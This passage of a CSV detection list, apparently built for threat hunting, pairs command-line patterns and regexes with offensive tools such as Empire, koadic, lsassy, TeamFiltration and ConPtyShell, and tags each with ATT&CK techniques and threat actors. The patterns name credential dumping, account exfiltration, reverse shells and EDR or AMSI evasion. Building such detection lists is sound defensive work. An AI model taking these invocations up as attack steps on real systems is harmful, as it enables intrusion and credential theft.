Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","0","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","658"
"* COMHijackToolkit.ps1*",".{0,1000}\sCOMHijackToolkit\.ps1.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","659"
"* --command * --output payload*",".{0,1000}\s\-\-command\s.{0,1000}\s\-\-output\spayload.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Resource Development","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z","660"
"* -command *.exe* -technique ccmstp*",".{0,1000}\s\-command\s.{0,1000}\.exe.{0,1000}\s\-technique\sccmstp.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","661"
"* command_exec.exe*",".{0,1000}\scommand_exec\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","662"
"* --command-uac-bypass*",".{0,1000}\s\-\-command\-uac\-bypass.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","663"
"* common_pass.txt*",".{0,1000}\scommon_pass\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","664"
"* ComputerDefaults.exe*",".{0,1000}\sComputerDefaults\.exe.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","665"
"* -ComputerName -ServiceEXE *",".{0,1000}\s\-ComputerName\s\-ServiceEXE\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-PsExec.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","666"
"* comsvcs_stealth.py*",".{0,1000}\scomsvcs_stealth\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","667"
"* ComunicationC2.cpp*",".{0,1000}\sComunicationC2\.cpp.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","668"
"* --config * --just-clean --cleaning-file *",".{0,1000}\s\-\-config\s.{0,1000}\s\-\-just\-clean\s\-\-cleaning\-file\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","669"
"* --config *.json --debug --exfil --onedrive*",".{0,1000}\s\-\-config\s.{0,1000}\.json\s\-\-debug\s\-\-exfil\s\-\-onedrive.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","670"
"* --config *.json --enum --validate-msol --usernames *",".{0,1000}\s\-\-config\s.{0,1000}\.json\s\-\-enum\s\-\-validate\-msol\s\-\-usernames\s.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","671"
"* --config *.json --enum --validate-teams*",".{0,1000}\s\-\-config\s.{0,1000}\.json\s\-\-enum\s\-\-validate\-teams.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","672"
"* --config *.json --exfil --aad*",".{0,1000}\s\-\-config\s.{0,1000}\.json\s\-\-exfil\s\-\-aad.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","673"
"* -config modlishka.json *",".{0,1000}\s\-config\smodlishka\.json\s.{0,1000}","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow.  which allows to transparently proxy multi-domain destination traffic.  both TLS and non-TLS.  over a single domain.  without a requirement of installing any additional certificate on the client.","T1557 - T1071 - T1583 - T1213","TA0001 - TA0008 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/drk1wi/Modlishka","1","0","N/A","network exploitation tool","5","10","4967","897","2024-04-19T12:23:00Z","2018-12-19T15:59:54Z","674"
"* configdhcpserver.sh*",".{0,1000}\sconfigdhcpserver\.sh.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","676"
"* Configure-Victim.ps1*",".{0,1000}\sConfigure\-Victim\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","677"
"* Configuring Windows Firewall rules to block EDR network access*",".{0,1000}\sConfiguring\sWindows\sFirewall\srules\sto\sblock\sEDR\snetwork\saccess.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","678"
"* ConfuserEx.exe*",".{0,1000}\sConfuserEx\.exe.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","679"
"* --confuserex-args *",".{0,1000}\s\-\-confuserex\-args\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","680"
"* --confuserex-module *",".{0,1000}\s\-\-confuserex\-module\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","681"
"* --confuserex-modules-in-dir *",".{0,1000}\s\-\-confuserex\-modules\-in\-dir\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","682"
"* --confuserex-path *",".{0,1000}\s\-\-confuserex\-path\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","683"
"* --confuserex-project-file *",".{0,1000}\s\-\-confuserex\-project\-file\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","684"
"* --confuserex-save-generated-project-file *",".{0,1000}\s\-\-confuserex\-save\-generated\-project\-file\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","685"
"* --connection-min-idle * ws://*",".{0,1000}\s\-\-connection\-min\-idle\s.{0,1000}\sws\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","690"
"* ConPtyShell*",".{0,1000}\sConPtyShell.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","0","N/A","N/A","10","10","1102","171","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z","691"
"* -consoleoutput -browsercredentials*",".{0,1000}\s\-consoleoutput\s\-browsercredentials.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","692"
"* -consoleoutput -DomainRecon*",".{0,1000}\s\-consoleoutput\s\-DomainRecon.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","693"
"* -consoleoutput -Localrecon*",".{0,1000}\s\-consoleoutput\s\-Localrecon.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","694"
"* -ConType bind *",".{0,1000}\s\-ConType\sbind\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-Vnc.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","695"
"* -ConType reverse *",".{0,1000}\s\-ConType\sreverse\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-Vnc.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","696"
"* --convert_idrsa_pub --publickey $HOME/.ssh/id_rsa.pub*",".{0,1000}\s\-\-convert_idrsa_pub\s\-\-publickey\s\$HOME\/\.ssh\/id_rsa\.pub.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","697"
"* ConvertToShellcode.py*",".{0,1000}\sConvertToShellcode\.py.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","0","N/A","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","698"
"* --copy-file --source-file *.docx --target-file *.docx --target-volume *",".{0,1000}\s\-\-copy\-file\s\-\-source\-file\s.{0,1000}\.docx\s\-\-target\-file\s.{0,1000}\.docx\s\-\-target\-volume\s.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","699"
"* core.payload *",".{0,1000}\score\.payload\s.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","700"
"* core.stager *",".{0,1000}\score\.stager\s.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","701"
"* Corrupt_AMSI.py*",".{0,1000}\sCorrupt_AMSI\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","702"
"* Corrupt_AMSI.vba*",".{0,1000}\sCorrupt_AMSI\.vba.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","703"
"* couchdb-databases.nse*",".{0,1000}\scouchdb\-databases\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","704"
"* couchdb-stats.nse*",".{0,1000}\scouchdb\-stats\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","705"
"* --crack * --ntds*",".{0,1000}\s\-\-crack\s.{0,1000}\s\-\-ntds.{0,1000}","offensive_tool_keyword","autoNTDS","autoNTDS is an automation script designed to simplify the process of dumping and cracking NTDS hashes using secretsdump.py and hashcat","T1003 - T1059 - T1021.002 - T1213","TA0006 - TA0008 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/hmaverickadams/autoNTDS","1","0","N/A","N/A","10","2","109","14","2023-10-31T22:03:58Z","2023-10-30T23:10:58Z","706"
"* crack_list client_wordlists.py*",".{0,1000}\scrack_list\sclient_wordlists\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","707"
"* crack_list cracklist_api.py*",".{0,1000}\scrack_list\scracklist_api\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","708"
"* crack_list dictionary.py*",".{0,1000}\scrack_list\sdictionary\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","709"
"* crack_list wordlist.py*",".{0,1000}\scrack_list\swordlist\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","710"
"* --crack-status*",".{0,1000}\s\-\-crack\-status.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","711"
"* --crawl=*",".{0,1000}\s\-\-crawl\=.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","712"
"* crawler.py -u http*",".{0,1000}\scrawler\.py\s\-u\shttp.{0,1000}","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Reconnaissance","https://github.com/eldraco/domain_analyzer","1","0","N/A","N/A","6","10","1858","241","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z","713"
